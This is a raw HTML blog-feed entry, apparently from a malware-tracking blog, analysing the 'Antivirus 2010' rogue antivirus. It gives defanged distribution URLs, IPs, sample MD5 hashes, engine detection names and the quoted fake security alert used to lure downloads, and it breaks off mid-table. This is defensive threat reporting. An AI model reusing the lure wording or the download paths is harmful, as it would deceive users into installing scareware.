scheme='http://www.blogger.com/atom/ns#' term='Antivirus 2010'/><title type='text'>best-click-scanner.info Antivirus 2010 Rogue AntiSpyware</title><content type='html'>&lt;div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"&gt;&lt;table width="560" height="1982" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"&gt;&lt;tr&gt;  &lt;td colspan="2" valign="top" height="833"&gt;&lt;p&gt;&lt;span style="font-size:14px; font-weight:bold"&gt;best-click-scanner.info Antivirus 2010 Rogue AntiSpyware&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;best-click-scanner.info, av1-click-download.info and av-click-site.info are site that distribute&lt;br /&gt;Antivirus 2010 a new rogue antivirus application&lt;br /&gt;&lt;br /&gt;Site screenshot:&lt;br /&gt;&lt;br /&gt;hxxp://best-click-scanner.info/scan.php [67.205.75.14]&lt;br /&gt;&lt;br /&gt;&lt;u&gt;&lt;b&gt;Fake Microsoft Security Warning Message&lt;/b&gt;&lt;/u&gt;:&lt;br /&gt;&lt;br /&gt;  Trojan.Mytob&lt;br /&gt;  Trojan.Zlob.z&lt;br /&gt;  Worm.Apache.x&lt;br /&gt;  Spyware.IEMonster.b&lt;br /&gt;  Zlob.PornAdvertiser.Xplisit&lt;br /&gt;  Trojan.InfoStealer.Banker.s  &lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/ScjVVL-d61I/AAAAAAAAAL4/L3kx8NPw_8M/s1600-h/Fake.Spyware.IEMonster.b-best-click-scanner.info.jpg"&gt;&lt;/a&gt;&lt;a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/ScjVU7LMa3I/AAAAAAAAALw/du4BZHmwj2w/s1600-h/Antivirus2010-best-click-scanner.info.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 245px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/ScjVU7LMa3I/AAAAAAAAALw/du4BZHmwj2w/s320/Antivirus2010-best-click-scanner.info.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5316733915569613682" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/ScjVVL-d61I/AAAAAAAAAL4/L3kx8NPw_8M/s1600-h/Fake.Spyware.IEMonster.b-best-click-scanner.info.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 237px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/ScjVVL-d61I/AAAAAAAAAL4/L3kx8NPw_8M/s320/Fake.Spyware.IEMonster.b-best-click-scanner.info.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5316733920079637330" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;u&gt;&lt;b&gt;Fake messages&lt;/b&gt;&lt;/u&gt;:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/ScjYTrin40I/AAAAAAAAAMA/VQ_XfvbZ9U4/s1600-h/Rogue.Antivirus2010-best-click-scanner.info.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 72px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/ScjYTrin40I/AAAAAAAAAMA/VQ_XfvbZ9U4/s320/Rogue.Antivirus2010-best-click-scanner.info.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5316737192727929666" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;table width="343" border="1" style="border:solid 1px #CCC" cellspacing="0" cellpadding="0"&gt;&lt;tr&gt;  &lt;td width="339" height="117"&gt;&lt;i&gt;Harmful and malicious software detected. These programs may damage your computer and steal your private information. Online Security Scanner requires Antivirus 2010 components to protect your computer. Please click OK to download and install Antivirus 2010 components.&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;Associated website [70.38.19.206]&lt;br /&gt;  &lt;br /&gt;  av1-click-download.info&lt;br /&gt;  av-click-site.info&lt;br /&gt;  &lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/ScjdT733qpI/AAAAAAAAAMY/nXRP2GG5X_k/s1600-h/av1-click-site.com.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 284px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/ScjdT733qpI/AAAAAAAAAMY/nXRP2GG5X_k/s320/av1-click-site.com.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5316742694670150290" /&gt;&lt;/a&gt;  &lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;  &lt;tr&gt;  &lt;td height="25" colspan="2" valign="top" style="background:url(http://2.bp.blogspot.com/_9YOi_bjoDL4/ScMyEsYqlmI/AAAAAAAAAHY/aZXlFPDe0HU/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"&gt;&lt;b&gt;Analysis:&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;  &lt;tr&gt;&lt;td height="208" valign="top"&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;br /&gt;&lt;table width="524" border="0" cellspacing="0" cellpadding="0"&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;Site URLs&lt;/b&gt;:&lt;/td&gt;  &lt;td colspan="2"&gt;hxxp://av1-click-download.info/install.php?campaign=&amp;amp;country=&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td colspan="3" bgcolor="#E8E8E8" style="height:2px"&gt;&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width="20"&gt;&amp;nbsp;&lt;/td&gt;&lt;td width="91"&gt;&lt;b&gt;File info&lt;/b&gt;:&lt;/td&gt;&lt;td colspan="2"&gt;AntiVirusInstaller.exe&lt;/td&gt;&lt;td width="18"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;File size&lt;/td&gt;&lt;td colspan="2"&gt;45588 bytes&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;MD5&lt;/td&gt;&lt;td colspan="2"&gt;4b28cc4e75b9f7d38725e76d05ffdea3&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td colspan="3" bgcolor="#E8E8E8" style="height:2px"&gt;&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;ThreatExpert:&lt;/b&gt;&lt;/td&gt;&lt;td colspan="2"&gt;&lt;a href="http://www.threatexpert.com/report.aspx?md5=4b28cc4e75b9f7d38725e76d05ffdea3" target="_blank"&gt;Report&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;VirusTotal&lt;/b&gt;:&lt;/td&gt;&lt;td colspan="2"&gt;&lt;a href="http://www.virustotal.com/analisis/a99923f43aa86fcab019513814dbaadc" target="_blank"&gt;Report&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;  &lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;Sunbelt&lt;/b&gt;:&lt;/td&gt;&lt;td colspan="2"&gt;&lt;a href="http://research.sunbelt-software.com/partnerresource/MD5.aspx?md5=4b28cc4e75b9f7d38725e76d05ffdea3" target="_blank"&gt;Report&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;  &lt;/tr&gt;  &lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;Prevx&lt;/b&gt;:&lt;/td&gt;&lt;td colspan="2"&gt;&lt;a href="http://info.prevx.com/aboutprogramtext.asp?PX5=F9087D0F14D1B013B27000343E7C3E004443FB03" target="_blank"&gt;Report&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;  &lt;/tr&gt;  &lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;First received&lt;/td&gt;&lt;td colspan="2"&gt;&lt;span id="status_fecha"&gt;03.23.2009 17:33:31 (CET)&lt;/span&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;Results&lt;/td&gt;&lt;td colspan="2"&gt;14/39 (35.90%)&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;Alias:&lt;/td&gt;&lt;td width="238"&gt;&lt;span style="color:#FF0000"&gt;Trojan.Win32.Tibs!IK&lt;/span&gt;&lt;/td&gt;&lt;td width="157"&gt;a-squared&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;HEUR/Crypted&lt;/span&gt;&lt;/td&gt;&lt;td&gt;Antivir&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Trojan.DownLoad.33135&lt;/span&gt;&lt;/td&gt;  &lt;td&gt;DrWeb&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Suspicious File&lt;/span&gt;&lt;/td&gt;&lt;td&gt; eSafe&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Trojan.Win32.Tibs&lt;/span&gt;&lt;/td&gt;&lt;td&gt;Ikraus&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Trojan-Downloader.Win32.FraudLoad.vmza&lt;/span&gt;&lt;/td&gt;  &lt;td&gt;Kaspersky&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Generic!Artemis&lt;/span&gt;&lt;/td&gt;&lt;td&gt;McAfee+Artemis&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Heuristic.Crypted&lt;/span&gt;&lt;/td&gt;&lt;td&gt;McAfee-GW-Edition&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;  &lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td width="238"&gt;&lt;span style="color:#FF0000"&gt;Trojan:Win32/Tibs.IT&lt;/span&gt;&lt;/td&gt;&lt;td&gt;Microsoft&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;  &lt;/tr&gt;  &lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Suspicious File&lt;/span&gt;&lt;/td&gt;&lt;td&gt;Panda&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;  &lt;/tr&gt;  &lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Medium Risk Malware&lt;/span&gt;&lt;/td&gt;&lt;td&gt;Prevx1&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;  &lt;/tr&gt;  &lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Trojan.DL.Win32.Mnless.cok&lt;/span&gt;&lt;/td&gt;&lt;td&gt;Rising&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;  &lt;/tr&gt;  &lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Trojan.Fakeavalert&lt;/span&gt;&lt;/td&gt;&lt;td&gt;Symantec&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;  &lt;/tr&gt;  &lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Cryp_FakeAV-11&lt;/span&gt;&lt;/td&gt;&lt;td&gt;TrendMicro&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;  &lt;/tr&gt;  &lt;/table&gt;  &lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;  &lt;tr&gt;&lt;td height="25" colspan="2" valign="top" style="background:url(http://2.bp.blogspot.com/_9YOi_bjoDL4/ScMyEsYqlmI/AAAAAAAAAHY/aZXlFPDe0HU/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"&gt;&lt;b&gt;Analysis of av1-click-download.info/en/PE/svchost.exe:&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;  &lt;tr&gt;&lt;td height="208" valign="top"&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;br /&gt;&lt;table width="524" border="0" cellspacing="0" cellpadding="0"&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;Site URLs&lt;/b&gt;:&lt;/td&gt;  &lt;td colspan="2"&gt;hxxp://av1-click-download.info/en/PE/svchost.exe&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td colspan="3" bgcolor="#E8E8E8" style="height:2px"&gt;&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width="20"&gt;&amp;nbsp;&lt;/td&gt;&lt;td width="101"&gt;&lt;b&gt;File info&lt;/b&gt;:&lt;/td&gt;&lt;td colspan="2"&gt;svchost.exe&lt;/td&gt;&lt;td width="18"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;File size&lt;/td&gt;&lt;td colspan="2"&gt;80896 Bytes&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;MD5&lt;/td&gt;&lt;td colspan="2"&gt;9ce49f6f3b41260def0a53a85d95f0d3&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td colspan="3" bgcolor="#E8E8E8" style="height:2px"&gt;&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;ThreatExpert:&lt;/b&gt;&lt;/td&gt;&lt;td colspan="2"&gt;&lt;a href="http://www.threatexpert.com/report.aspx?md5=9ce49f6f3b41260def0a53a85d95f0d3" target="_blank"&gt;Report&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;Anubis:&lt;/b&gt;&lt;/td&gt;&lt;td colspan="2"&gt;&lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=104e0c0dc6daaf21411f62861b47c9fef&amp;amp;format=html" target="_blank"&gt;Report&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;VirusTotal&lt;/b&gt;:&lt;/td&gt;&lt;td colspan="2"&gt;&lt;a href="http://www.virustotal.com/analisis/9f9e57b6505e1c8ebc5ba6b9316f591b" target="_blank"&gt;Report&lt;/a&gt; - &lt;a href="http://www.virustotal.com/analisis/d8176c3c8c6057dd5ae12b8d54690bb9" target="_blank"&gt;Reanalysed&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;  &lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;Sunbelt&lt;/b&gt;:&lt;/td&gt;&lt;td colspan="2"&gt;&lt;a href="http://research.sunbelt-software.com/partnerresource/MD5.aspx?md5=9ce49f6f3b41260def0a53a85d95f0d3" target="_blank"&gt;Malware Report for ID: 8064472&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;  &lt;/tr&gt;  &lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;First received&lt;/td&gt;&lt;td colspan="2"&gt;03.24.2009 06:11:38 (CET)&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;Results&lt;/td&gt;&lt;td colspan="2"&gt;Result: 8/38 (21.05%)&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;Alias:&lt;/td&gt;&lt;td width="228"&gt;&lt;span style="color:#FF0000"&gt;TR/Fakealert.WW.2&lt;/span&gt;&lt;/td&gt;  &lt;td width="157"&gt;Antivir&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Suspicious file&lt;/span&gt;&lt;/td&gt;&lt;td&gt;eSafe&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Suspicious:W32/Malware!Gemini&lt;/span&gt;&lt;/td&gt;&lt;td&gt;F-Secure&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Trojan:Win32/Tibs.IT&lt;/span&gt;&lt;/td&gt;&lt;td&gt; Microsoft&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Suspicious file&lt;/span&gt;&lt;/td&gt;  &lt;td&gt;Panda&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;AdWare.Win32.FakeAV.q&lt;/span&gt;&lt;/td&gt;&lt;td&gt;Rising&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Trojan.Fakeavalert&lt;/span&gt;&lt;/td&gt;  &lt;td&gt;Symantec&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;PAK_Generic.001&lt;/span&gt;&lt;/td&gt;&lt;td&gt;TrendMicro&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;  &lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;  &lt;tr&gt;&lt;td height="25" colspan="2" valign="top" style="background:url(http://2.bp.blogspot.com/_9YOi_bjoDL4/ScMyEsYqlmI/AAAAAAAAAHY/aZXlFPDe0HU/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"&gt;&lt;b&gt;Result when running:&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;  &lt;tr&gt;&lt;td height="200"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;br /&gt;Display fake BlueScreen &amp;quot;MALWARE.MONSTER.DX_NEW_0xA21518F0&amp;quot; &lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/ScjhFLB_2PI/AAAAAAAAAMg/on_9hSLUXPc/s1600-h/fake-bsod.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 226px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/ScjhFLB_2PI/AAAAAAAAAMg/on_9hSLUXPc/s320/fake-bsod.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5316746839087634674" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;  &lt;tr&gt;  &lt;td height="25" colspan="2" valign="top" style="background:url(http://2.bp.blogspot.com/_9YOi_bjoDL4/ScMyEsYqlmI/AAAAAAAAAHY/aZXlFPDe0HU/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"&gt;&lt;b&gt;Analysis of av1-click-download.info/en/PE/install.exe:&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width="25" height="208" valign="top"&gt;&lt;br /&gt;&lt;/td&gt;&lt;td width="547"&gt;&lt;br /&gt;&lt;table width="514" border="0" cellspacing="0" cellpadding="0"&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;Site URLs&lt;/b&gt;:&lt;/td&gt;&lt;td&gt;hxxp://av1-click-download.info/en/PE/install.exe&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td colspan="2" bgcolor="#E8E8E8" style="height:2px"&gt;&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width="25"&gt;&amp;nbsp;&lt;/td&gt;&lt;td width="88"&gt;&lt;b&gt;File info&lt;/b&gt;:&lt;/td&gt;&lt;td width="384"&gt;install.exe&lt;/td&gt;&lt;td 